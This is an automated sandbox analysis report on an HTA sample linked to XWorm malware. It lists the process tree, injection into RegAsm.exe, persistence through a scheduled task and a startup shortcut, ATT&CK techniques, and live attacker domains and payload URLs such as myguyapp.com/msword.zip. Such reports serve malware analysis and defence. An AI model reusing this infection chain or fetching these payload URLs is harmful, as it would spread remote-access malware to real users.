              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002B0030 GetLocalTime,__swprintf,29_2_002B0030
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002B0722 GetUserNameW,29_2_002B0722
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002A416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,29_2_002A416A
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 14_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,14_2_00406805
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: RegAsm.exe, 00000029.00000002.3851904482.0000000001442000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: 29.3.Carter.pif.38bceb0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.3.Carter.pif.38bceb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.3.Carter.pif.38bceb0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 41.2.RegAsm.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Carter.pif.38bceb0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.3.Carter.pif.38bceb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Carter.pif.38bceb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001D.00000003.3345618288.00000000038E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.3345732734.0000000003871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000029.00000002.3850092334.0000000000D52000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000029.00000002.3852880211.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.3852824301.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.3345732734.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.3345997131.00000000038B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.3291441566.0000000001128000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.3345618288.00000000038D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Carter.pif PID: 9124, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 8756, type: MEMORYSTR
Source: DanielPulse.scr | Binary or memory string: WIN_81
Source: DanielPulse.scr | Binary or memory string: WIN_XP
Source: DanielPulse.scr | Binary or memory string: WIN_XPe
Source: DanielPulse.scr | Binary or memory string: WIN_VISTA
Source: DanielPulse.scr | Binary or memory string: WIN_7
Source: DanielPulse.scr | Binary or memory string: WIN_8
Source: Carter.pif.20.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Source: Yara match | File source: 29.3.Carter.pif.38bceb0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.3.Carter.pif.38bceb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.3.Carter.pif.38bceb0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 41.2.RegAsm.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Carter.pif.38bceb0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.3.Carter.pif.38bceb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.Carter.pif.38bceb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001D.00000003.3345618288.00000000038E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.3345732734.0000000003871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000029.00000002.3850092334.0000000000D52000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000029.00000002.3852880211.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.3852824301.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.3345732734.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.3345997131.00000000038B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.3291441566.0000000001128000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.3345618288.00000000038D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Carter.pif PID: 9124, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 8756, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002E696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,29_2_002E696E
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002E6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,29_2_002E6E32
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_0095696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,37_2_0095696E
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_00956E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,37_2_00956E32
MITRE ATT&CK Matrix (techniques listed per tactic column, in matrix row order; a leading number is the count badge shown in the report matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: 111 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 11 Windows Management Instrumentation; 2 Native API; 1 Command and Scripting Interpreter; 1 Scheduled Task/Job; 2 PowerShell; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 111 Scripting; 1 DLL Side-Loading; 2 Valid Accounts; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 212 Process Injection; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; Scheduled Task/Job; At; Cron
Defense Evasion: 11 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading; 111 Masquerading; 2 Valid Accounts; 41 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 212 Process Injection
Credential Access: 21 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 2 System Time Discovery; 1 Account Discovery; 3 File and Directory Discovery; 29 System Information Discovery; 51 Security Software Discovery; 41 Virtualization/Sandbox Evasion; 4 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery; Network Service Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 11 Archive Collected Data; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 2 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph ID: 1573971 | Sample: c2.hta | Startdate: 12/12/2024 | Architecture: WINDOWS | Score: 100
Contacted hosts: myguyapp.com; me-work.com; 3 other IPs or domains
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 18 other signatures

Process tree (dropped files and signatures are listed under the process they were attributed to):
• mshta.exe
  Network: myguyapp.com 193.26.115.21, 443, 49708, 49710 QUICKPACKETUS Netherlands
  Dropped: C:\Users\user\AppData\Local\Temp\temp.bat (ASCII); C:\Users\user\AppData\Local\...\c[1].bat (ASCII)
  • cmd.exe
    Signatures: Suspicious powershell command line found; Drops PE files with a suspicious file extension; Uses schtasks.exe or at.exe to add and modify task schedules
    • msword.exe
      • cmd.exe
        Dropped: C:\Users\user\AppData\Local\...\Carter.pif (PE32)
        • Carter.pif
          Dropped: C:\Users\user\AppData\...\DanielPulse.scr (PE32); C:\Users\user\AppData\...\DanielPulse.js (ASCII); C:\Users\user\AppData\Local\...\RegAsm.exe (PE32)
          Signatures: Drops PE files with a suspicious file extension; Writes to foreign memory regions; Injects a PE file into a foreign processes
          • cmd.exe
            Dropped: C:\Users\user\AppData\...\DanielPulse.url (MS)
            • conhost.exe
          • cmd.exe
            • conhost.exe
            • schtasks.exe
          • RegAsm.exe
        • conhost.exe
        • tasklist.exe
        • 7 other processes
    • powershell.exe
      Dropped: C:\Users\user\AppData\Local\Temp\f.pdf (PDF)
      Signatures: Drops large PE files; Powershell drops PE file
    • powershell.exe
      Dropped: C:\Users\user\AppData\Local\...\msword.exe (PE32)
      Signatures: Loading BitLocker PowerShell Module
    • 3 other processes
      Dropped: C:\Users\user\AppData\Local\Temp\msword.zip (Zip)
      • AcroCEF.exe
        • AcroCEF.exe
  • cmd.exe
    • conhost.exe
    • timeout.exe
• wscript.exe
  Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
  • DanielPulse.scr
• wscript.exe

Antivirus detection (sample)
Source | Detection | Scanner
c2.hta | 8% | ReversingLabs

Antivirus detection (dropped files)
Source | Detection | Scanner
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | 8% | ReversingLabs
C:\Users\user\AppData\Local\Temp\220239\Carter.pif | 8% | ReversingLabs
C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\msword\msword.exe | 8% | ReversingLabs

No Antivirus matches
No Antivirus matches
Antivirus detection (URLs)
Source | Detection | Scanner | Label
https://myguyapp.com/f.pdfI | 0% | Avira URL Cloud | safe
https://myguyapp.com/c.batE& | 0% | Avira URL Cloud | safe
https://myguyapp.com/mswor | 0% | Avira URL Cloud | safe
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPR | 0% | Avira URL Cloud | safe
https://myguyapp.com/x | 0% | Avira URL Cloud | safe
https://myguyapp.c | 0% | Avira URL Cloud | safe
https://myguyapp.com/c.bat | 0% | Avira URL Cloud | safe
https://myguyapp.com/msword.zip | 100% | Avira URL Cloud | malware
https://myguyapp.com/ | 0% | Avira URL Cloud | safe
https://myguyapp.com/msword.zip&Y5=J | 0% | Avira URL Cloud | safe
https://myguyapp.com/msword.zipPROCESSOR_ARCHITEW64 | 0% | Avira URL Cloud | safe
me-work.com | 0% | Avira URL Cloud | safe
https://myguyapp.com/f.pdfW | 0% | Avira URL Cloud | safe
https://myguyapp.com/msword.zipurl2=https:8X | 0% | Avira URL Cloud | safe
https://myguyapp.com/f.pdfl | 0% | Avira URL Cloud | safe
https://myguyapp.com/f.pdf6C | 0% | Avira URL Cloud | safe
https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=h | 0% | Avira URL Cloud | safe
https://myguyapp.com/c.batU | 0% | Avira URL Cloud | safe
https://myguyapp.com/f.pdf- | 0% | Avira URL Cloud | safe
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_$ | 0% | Avira URL Cloud | safe
https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPROFILE=user | 0% | Avira URL Cloud | safe
https://myguyapp.com/f.pdfq | 0% | Avira URL Cloud | safe
https://myguyapp.com/f.pdf | 0% | Avira URL Cloud | safe
https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPR | 0% | Avira URL Cloud | safe
https://myguyapp.com/f.pdf: | 0% | Avira URL Cloud | safe
https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPROFILE=user-PCUSER | 0% | Avira URL Cloud | safe
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | - | high
me-work.com | 193.26.115.21 | true | true | - | unknown
myguyapp.com | 193.26.115.21 | true | true | - | unknown
x1.i.lencr.org | unknown | unknown | false | - | high
dwLscOsEZmpbOxr.dwLscOsEZmpbOxr | unknown | unknown | true | - | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
https://myguyapp.com/msword.zip | true | Avira URL Cloud: malware | unknown
https://myguyapp.com/c.bat | true | Avira URL Cloud: safe | unknown
me-work.com | true | Avira URL Cloud: safe | unknown
https://myguyapp.com/f.pdf | true | Avira URL Cloud: safe | unknown
URLs from memory and binary strings
Name | Source | Malicious | Antivirus Detection | Reputation
https://myguyapp.com/ | mshta.exe, tasklist.exe, Carter.pif (process memory) | true | Avira URL Cloud: safe | unknown
https://myguyapp.com/mswor | tasklist.exe (process memory) | true | Avira URL Cloud: safe | unknown
http://www.autoitscript.com/autoit3/J | msword.exe, Carter.pif, DanielPulse.scr (process memory), Missouri.14.dr, Carter.pif.20.dr | false | - | high
https://myguyapp.com/msword.zip&Y5=J | cmd.exe (process memory) | false | Avira URL Cloud: safe | unknown
http://x1.i.lencr.org/ | 2D85F72862B55C4EADD9E66E06947F3D0.8.dr | false | - | high
https://myguyapp.com/f.pdfI | tasklist.exe (process memory) | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/x | mshta.exe (process memory) | false | Avira URL Cloud: safe | unknown
https://myguyapp.c | RegAsm.exe (process memory) | true | Avira URL Cloud: safe | unknown
https://myguyapp.com/c.batE& | mshta.exe (process memory) | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPR | RegAsm.exe (process memory) | false | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | msword.exe (process memory), msword.exe.13.dr | false | - | high
https://myguyapp.com/f.pdfW | RegAsm.exe (process memory) | false | Avira URL Cloud: safe | unknown
https://www.autoitscript.com/autoit3/ | msword.exe, Carter.pif (process memory), Missouri.14.dr, Carter.pif.20.dr | false | - | high
https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=h | Carter.pif (process memory) | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/msword.zipurl2=https:8X | Carter.pif (process memory) | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/f.pdf6C | tasklist.exe (process memory) | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/msword.zipPROCESSOR_ARCHITEW64 | RegAsm.exe (process memory) | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_$ | tasklist.exe (process memory) | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/c.batU | mshta.exe (process memory) | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/f.pdfl | tasklist.exe (process memory) | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/f.pdf- | Carter.pif (process memory) | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/f.pdfq | msword.exe (process memory) | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPROFILE=user | RegAsm.exe (process memory) | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegAsm.exe (process memory) | false | - | high
https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPROFILE=user-PCUSER | Carter.pif (process memory) | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/f.pdf: | RegAsm.exe (process memory) | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPR | Carter.pif (process memory) | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
193.26.115.21 | me-work.com | Netherlands | 46261 | QUICKPACKETUS | true
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1573971
                                  Start date and time:2024-12-12 19:06:09 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 12m 30s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:42
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:c2.hta
                                  Detection:MAL
                                  Classification:mal100.troj.expl.evad.winHTA@69/80@4/1
                                  EGA Information:
                                  • Successful, ratio: 80%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 106
                                  • Number of non-executed functions: 295
                                  Cookbook Comments:
                                  • Found application associated with file extension: .hta
                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 23.218.208.137, 162.159.61.3, 172.64.41.3, 18.213.11.84, 54.224.241.105, 50.16.47.176, 34.237.241.83, 23.195.61.56, 2.22.50.144, 2.22.50.131, 184.30.20.134, 92.122.101.8, 92.122.101.58, 23.218.208.109, 172.202.163.200, 23.206.229.226
                                  • Excluded domains from analysis (whitelisted): www.bing.com, e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, e4578.dscb.akamaiedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, a767.dspw65.akamai.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl.adobe.com.edgekey.net, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
• Execution Graph export aborted for target mshta.exe, PID 7864 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • VT rate limit hit for: c2.hta
Time | Type | Description
13:07:09 | API Interceptor | 92x Sleep call for process: mshta.exe modified
13:07:10 | API Interceptor | 90x Sleep call for process: powershell.exe modified
13:07:26 | API Interceptor | 2x Sleep call for process: AcroCEF.exe modified
13:08:36 | API Interceptor | 425x Sleep call for process: timeout.exe modified
13:08:37 | API Interceptor | 4367x Sleep call for process: Carter.pif modified
13:10:19 | API Interceptor | 948x Sleep call for process: RegAsm.exe modified
19:08:00 | Task Scheduler | Run new task: Wagner path: wscript s>//B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
19:08:01 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url
Match | Associated Sample Name / URL | Detection | Threat Name | Context
193.26.115.21 | c2.hta | malicious | XWorm | myguyapp.com/msword.zip
Match | Associated Sample Name / URL | Detection | Threat Name | Context
me-work.com | c2.hta | malicious | XWorm | 193.26.115.21
me-work.com | c2.hta | malicious | XWorm | 87.120.117.152
me-work.com | p5.hta | malicious | XWorm | 45.88.186.197
bg.microsoft.map.fastly.net | 9MQYWJVQut.exe | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | NOTIFICACIONES+FISCALES+Y+DEMANDAS+PENDIENTES.pdf.pdf | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | Payment Remittance Advice Details.vbs | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | Dec_2024 Shipment Packing List.vbs | malicious | AsyncRAT, VenomRAT | 199.232.210.172
bg.microsoft.map.fastly.net | Payment Advice-Dec-2024.vbs | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | https://cdn.iobit.com/dl/driver_booster_setup.exe | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | Payment Advice - Advice RefA1VcCagmbe12 Priority payment Customer Ref3509477.msg | malicious | XWorm | 199.232.210.172
bg.microsoft.map.fastly.net | OR8Ti8rf8h.exe | malicious | AveMaria, DcRat, StormKitty, VenomRAT | 199.232.214.172
bg.microsoft.map.fastly.net | HvASs4SYK9.exe | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | Rockwool-Msg-S9039587897.pdf | malicious | EvilProxy, HTMLPhisher | 199.232.210.172
myguyapp.com | c2.hta | malicious | XWorm | 193.26.115.21
myguyapp.com | EeSNugjFh5.bat | malicious | Unknown | 193.26.115.21
myguyapp.com | c2.hta | malicious | XWorm | 193.26.115.21
Match | Associated Sample Name / URL | Detection | Threat Name | Context
QUICKPACKETUS | c2.hta | malicious | XWorm | 193.26.115.21
QUICKPACKETUS | EeSNugjFh5.bat | malicious | Unknown | 193.26.115.21
QUICKPACKETUS | https://webradiojaguar.net/FNB-POP.pdf | malicious | Unknown | 172.82.129.154
QUICKPACKETUS | c2.hta | malicious | XWorm | 193.26.115.21
QUICKPACKETUS | Play_VM-NowCRQW.html | malicious | HTMLPhisher | 172.82.129.154
QUICKPACKETUS | new.ini.ps1 | malicious | Unknown | 167.88.162.71
QUICKPACKETUS | i586.elf | malicious | Unknown | 172.82.144.22
QUICKPACKETUS | sh4.elf | malicious | Mirai | 208.166.51.211
QUICKPACKETUS | mips.elf | malicious | Unknown | 103.136.150.114
QUICKPACKETUS | ppc.elf | malicious | Unknown | 103.136.150.114
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Hydra.ccLoader.bat | malicious | Unknown | 193.26.115.21
3b5074b1b5d032e5620f69f9f700ff0e | 4JwhvqLe8n.exe | malicious | Remcos | 193.26.115.21
3b5074b1b5d032e5620f69f9f700ff0e | full.exe | malicious | Quasar | 193.26.115.21
3b5074b1b5d032e5620f69f9f700ff0e | fIPSLgT0lO.exe | malicious | Remcos | 193.26.115.21
3b5074b1b5d032e5620f69f9f700ff0e | hoTwj68T1D.exe | malicious | Unknown | 193.26.115.21
3b5074b1b5d032e5620f69f9f700ff0e | 4JwhvqLe8n.exe | malicious | Unknown | 193.26.115.21
3b5074b1b5d032e5620f69f9f700ff0e | fIPSLgT0lO.exe | malicious | Unknown | 193.26.115.21
3b5074b1b5d032e5620f69f9f700ff0e | 3XSXmrEOw7.exe | malicious | Remcos | 193.26.115.21
3b5074b1b5d032e5620f69f9f700ff0e | ozfqy8Ms6t.exe | malicious | Remcos | 193.26.115.21
